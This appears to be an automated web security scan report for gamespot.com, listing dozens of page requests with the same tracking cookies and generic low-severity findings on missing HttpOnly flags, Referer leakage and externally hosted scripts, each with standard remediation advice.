GET /pc/strategy/ageofempiresiii/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps2/action/grandtheftautovicecity/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps2/action/gta4/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ps2/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps3/action/assassinscreedbrotherhood/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps3/action/grandtheftauto4/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ps3/action/uncharted3drakesdeception/video/6285796 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps3/driving/granturismo52/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ps3/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /psp/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /reviews.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signup/raptr/upgrade.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /video/6258426 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /videos/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wii/action/smb/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wii/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox/action/gta4/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox360/action/assassinscreedbrotherhood/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox360/action/callofduty7workingtitle/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xbox360/action/grandtheftautoivtheballadofgaytony/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox360/action/reddeadredemption/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox360/action/saintsrow/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xbox360/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xbox360/rpg/falloutnewvegas/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /android/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /best-of-2010/game-of-the-year/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cheats.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /downloads/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ds/action/supermariobrosds/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ds/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /features/6257476/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /features/6285489/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/fav_boards.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
